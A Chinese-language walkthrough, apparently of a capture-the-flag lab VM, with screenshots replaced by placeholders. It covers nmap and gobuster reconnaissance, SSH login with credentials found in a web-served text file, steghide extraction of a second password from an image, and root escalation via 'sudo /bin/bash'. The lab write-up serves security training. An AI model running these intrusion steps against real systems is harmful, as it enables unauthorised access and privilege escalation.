信息搜集

1
nmap -sN 192.168.3.0/24 #扫描C段

image-20230907105155926

1
nmap -sn 192.168.3.19  #扫描tcp端口

image-20230907105100319

1
2
22/tcp open  ssh                                                       
80/tcp open http
1
nmap -sT -sV -O -p22,80 192.168.3.19

image-20230907105401560

1
nmap --script=vuln -p22,80 192.168.3.19 #利用nmap内置漏洞脚本进行漏洞扫描

image-20230907105645776

没有发现漏洞,尝试访问80端口进行查看,为标准的apache2界面,尝试目录扫描。

image-20230907105801938

1
gobuster dir -u 192.168.3.19:80 -x txt,php,zip -w /usr/share/dirbuster/wordlists/directory-list-1.0.txt         

image-20230907110453383

notes.txt内容如下,有两个提示image-20230907110305212

打开remb.txt查看,像是ssh连接账号密码

image-20230907110407822

ssh连接

image-20230907110602134

用户名@地址

bash

image-20230907094405082

家目录下有两个用户

image-20230907094628214

进入到mhz_c1f目录下后发现有多个图片

image-20230907110659344

下载远程文件到本地

1
scp first_stage@192.168.3.19:/home/mhz_c1f/Paintings/* /vulnotes/mhz_c1f/

image-20230907095303936

直接打开图片发现没有任何可利用信息

1.查看是否有图片捆绑

1
2
binwalk 用于搜索二进制图像的嵌入文件和可执行代码的工具
binwalk *.jpeg

image-20230907100240022

2.查看是否有隐写信息

1
steghide info spinning\ the\ wool.jpeg

image-20230907101301021

提取内嵌信息

提示Enter passphrase 输入了几个密码都不正确,尝试直接回车(可能是空密码),提示成功(前提需要root权限)

1
steghide extract -sf spinning\ the\ wool.jpeg

image-20230907101804351

1
cat remb2.txt 

image-20230907110909628

1
2
su mhz_c1f   #切换mhz_c1f用户
sudo -l #查看权限 为root

image-20230907111227140

1
sudo /bin/bash  : 这个命令也会切换到root的bash下,但不能完全拥有root的所有环境变量,比如PATH,可以拥有root用户的权限。这个命令和 sudo -s 是等同的。

image-20230907102417595

1
2
ls –liah                            #-h以字节显示文件和目录的大小
ls -a #显示所有文件包括隐藏的

image-20230907111418992